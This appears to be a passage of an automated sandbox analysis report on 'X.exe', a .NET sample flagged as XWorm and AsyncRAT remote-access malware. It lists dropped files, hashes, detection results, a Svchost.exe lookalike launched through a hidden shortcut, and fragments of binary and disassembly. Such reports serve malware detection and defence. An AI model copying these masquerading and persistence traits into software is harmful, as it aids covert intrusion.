                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.1.7.4.6.3.0.5.0.5.5.9.9.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.1.7.4.6.3.0.6.3.0.6.0.0.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.9.2.4.0.5.4.-.4.8.8.1.-.4.a.1.e.-.9.3.9.0.-.1.0.6.9.b.6.6.d.8.6.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.1.a.c.e.5.c.-.e.c.6.2.-.4.7.1.7.-.a.e.c.1.-.a.9.6.a.4.a.d.3.8.3.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.X...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.8.-.0.0.0.1.-.0.0.1.5.-.2.4.d.c.-.b.7.6.8.6.c.5.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.1.9.5.f.c.3.8.8.a.f.4.3.5.9.5.d.8.0.1.5.b.1.2.d.e.1.5.5.e.8.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.0.1.9.7.d.2.d.a.7.6.f.5.6.3.3.7.3.6.8.6.d.d.1.0.4.3.0.5.d.1.e.e.b.2.1.e.c.7.c.!.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:Mini DuMP crash report, 16 streams, Wed Feb 7 02:25:05 2024, 0x1205a4 type
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):567109
                                                                                                                                                                                                        Entropy (8bit):2.944583883933173
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:XtdNB0eWXlYqGY3Qo3i52tgyZZ512XVoHw7okzPI1hzSDpm1j:XNseqGMQoGo/X
                                                                                                                                                                                                        MD5:BC824AFD350C6B19107C8BDCE1962AB8
                                                                                                                                                                                                        SHA1:506BD12DF00071FE2819EBC87B4A12F168BF2045
                                                                                                                                                                                                        SHA-256:CAFDAFBC8824B475E23CADF137CF5EEC4E36732B3222E6065E42660DE89B0A57
                                                                                                                                                                                                        SHA-512:CDD0BD7669779AA96345502565CDEA5945E6934FD67A6E63F62140077EECEA33AE3FA994E336BF2A6FA68713294235048454522B5FE994D3A9E4CF57AD6F6BB5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MDMP..a..... ..........e........................(-..........<....7...........8......d@..............l.......8...........T............t...2...........K...........M..............................................................................eJ.......M......Lw......................T...........>..e....j........................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8888
                                                                                                                                                                                                        Entropy (8bit):3.6998852811060123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJpyZV5E6Y2DuTgmfZN8npr/89bQFQejfuQm:R6lXJcZV66YTTgmfDTQCejfg
                                                                                                                                                                                                        MD5:82E4A83CAF53A44EE6A7C5A6BA158FC3
                                                                                                                                                                                                        SHA1:867E4BF65A047435B7BBF30C94C2EAA618117A06
                                                                                                                                                                                                        SHA-256:673B75BB03BB0C41E9A7466CB98BEB61839178CFC0E8C32DD7A6A7B775414C9A
                                                                                                                                                                                                        SHA-512:453007EB22B89EB92B08CAA0BAE610779A957B6BDCEA1C8177EF5236B3E1DD3808CA39E2BD25452678228F4E448C0167EDAB6BC87FE5C24B693C92B668BCC12E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.6.<./.P.i.
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4717
                                                                                                                                                                                                        Entropy (8bit):4.417876421283829
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zssJg771I9wbWpW8VYZYm8M4JbEFlqyq8vVhYtCd:uIjfqI7Xq7VhJJWjYtCd
                                                                                                                                                                                                        MD5:E706F3B84A73BB7911ADB0AF51FC1F45
                                                                                                                                                                                                        SHA1:9D18759F6D868E60C98F46C07B8DB01480823B11
                                                                                                                                                                                                        SHA-256:41FB4ADA00E3B3DFA4440D9FC71DAEC96B52B03C2C2F6B2DCA6BE8D695CD7884
                                                                                                                                                                                                        SHA-512:E401767F14633DBB19E7A5F4CEA9155FF6F8FF1E0379EE7DF49D5AB68B4E9B055E56452131DBD18EC9D30906DDAA4E93512D00705BE755F11830A9C64A5D6CA2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="182487" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72594
                                                                                                                                                                                                        Entropy (8bit):3.0998014819683593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:wD6ITG3zghmRccxLQr76VnSGxYGu41otGYx8skk6eQsR4R3:wD6ITG3zghmRccxLQreVnSGxYGu41otm
                                                                                                                                                                                                        MD5:40EB42ED014150D8BDAF802A2C1C6A1D
                                                                                                                                                                                                        SHA1:B002001B919BD65A0ACE5C54C25DE6DC8A77BEC4
                                                                                                                                                                                                        SHA-256:630CDB5FCA04ED1B7103C9FA20DAD5303DCF730312EC62B3985166E621C99B37
                                                                                                                                                                                                        SHA-512:6CDA2405305582FFA418D4560B0FCF7170EE9B3D63F79E36C7EF98AA028B5AC70200ED2C1ADCB513521BA2369F7864C3144A170596B713EF66ECFD1CCF396367
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                        Entropy (8bit):2.6851294232856397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TiZYWev25pXYuYWWWmdpHBUYEZrBtFir+I6cwV/Mz1aDdlMleonI2m3:2ZDPZNhg1aDdlMleoI2m3
                                                                                                                                                                                                        MD5:0A7C54469DB90B03C85AD9B6E2B6E17B
                                                                                                                                                                                                        SHA1:AF25BFA175E61C31CFECAC8ECF4B88123A72CECC
                                                                                                                                                                                                        SHA-256:A7658FE2E7D1FC17674636D83A3176097FF837FE65555966482BCBE3BAD8E642
                                                                                                                                                                                                        SHA-512:314BC71C324CFFD0B6AAA2383ABCBF3C4C86C83D91E430E560E70EBD28DACEC46AC72F216CBE6C90024478C459701DFC31BAA2BF4B1F0985833DDABE40642A54
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):654
                                                                                                                                                                                                        Entropy (8bit):5.380476433908377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):5.5767765436987435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                                                        MD5:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        SHA1:F0197D2DA76F563373686DD104305D1EEB21EC7C
                                                                                                                                                                                                        SHA-256:3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                                                                                                                                                                                                        SHA-512:72593F450A183A53C81A70F9C23AB0EBA4CE46C64C3713F64A6606A3F3344305DFBE3D747FDE2C5353BCB6463EEEFC9B3B0B29395FEB9D71BC540A8D451A72AF
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 79%, Browse
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........V...N............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\X.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 01:21:55 2024, mtime=Wed Feb 7 01:21:55 2024, atime=Wed Feb 7 01:21:55 2024, length=36864, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1055
                                                                                                                                                                                                        Entropy (8bit):4.9692562478751325
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:8cu/cvDEilX1JXLeRtgKaKAtak17i7qygm:8cukvDHlT7eRGAk1Vyg
                                                                                                                                                                                                        MD5:C4B9F6B1A48EFE95E560323EDB1F2E62
                                                                                                                                                                                                        SHA1:8171D08E54023990DC75AEF5F90060E80B3B626C
                                                                                                                                                                                                        SHA-256:D00F171A13E2673CB479585CAC7BA9F4CC9DB75A6A8FFDA395508D8936DC3EB5
                                                                                                                                                                                                        SHA-512:FB0C2C7BE7280205660C43C48A3EA56305077208BE2E6FA79A627F03EF8550B404C3F304C50479307FF453D399BBA463D2FC85C8B61CAC990CF24C2C774EAB7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:L..................F.... ...".bklY..".bklY..".bklY............................:..DG..Yr?.D..U..k0.&...&.......$..S....dlY..M.klY......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2GX.............................^.A.p.p.D.a.t.a...B.P.1.....GX....Local.<......EW<2GX......[......................J..L.o.c.a.l.....N.1.....GX....Temp..:......EW<2GX......^......................!%.T.e.m.p.....b.2.....GX.. .Svchost.exe.H......GX..GX......S......................Y^.S.v.c.h.o.s.t...e.x.e......._...............-.......^...........x........C:\Users\user\AppData\Local\Temp\Svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......783875...........hT..CrF.f4... .B...Jc...-...-$..hT..CrF.f4... .B...Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..
                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                        Entropy (8bit):4.468517395503153
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:lzZfpi6ceLPx9skLmb0ftZWSP3aJG8nAgeiJRMMhA2zX4WABluuNzjDH5S:dZHttZWOKnMM6bFpdj4
                                                                                                                                                                                                        MD5:73207BB482D02882C7BA9B8A018E0F65
                                                                                                                                                                                                        SHA1:BCEF05F2F9AA1F943B5816BB8AF134C18BD6A536
                                                                                                                                                                                                        SHA-256:7D0F8024700DB1D3597173F7030E9B5B49211E59914638B0402983DD2C72633A
                                                                                                                                                                                                        SHA-512:7A1D2B2F4F8847CA8B8CB85652074237B7DC9086ED8E80A71FAE2F28A8345D513C3E5E462E806161436788037E98C589C8FFA1AE11AB5A9F69C69321318E7B73
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^.a.lY................................................................................................................................................................................................................................................................................................................................................v.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):5.5767765436987435
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                        File name:X.exe
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5:f57ec853b0f01b0e9954cfbf8feeb081
                                                                                                                                                                                                        SHA1:f0197d2da76f563373686dd104305d1eeb21ec7c
                                                                                                                                                                                                        SHA256:3d07268c23490174416ef5a8061e318b5b8b820cb89b27803996085c3b3ee927
                                                                                                                                                                                                        SHA512:72593f450a183a53c81a70f9c23ab0eba4ce46c64c3713f64a6606a3f3344305dfbe3d747fde2c5353bcb6463eeefc9b3b0b29395feb9d71bc540a8d451a72af
                                                                                                                                                                                                        SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                                                        TLSH:02F26D483B908721D6EE2FF52DB3A14A023AF51B4D17E75E0CD4898A6B776C389007F6
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................. ........@.. ....................................@................................
                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                        Entrypoint:0x40a5ee
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x65A98107 [Thu Jan 18 19:50:31 2024 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
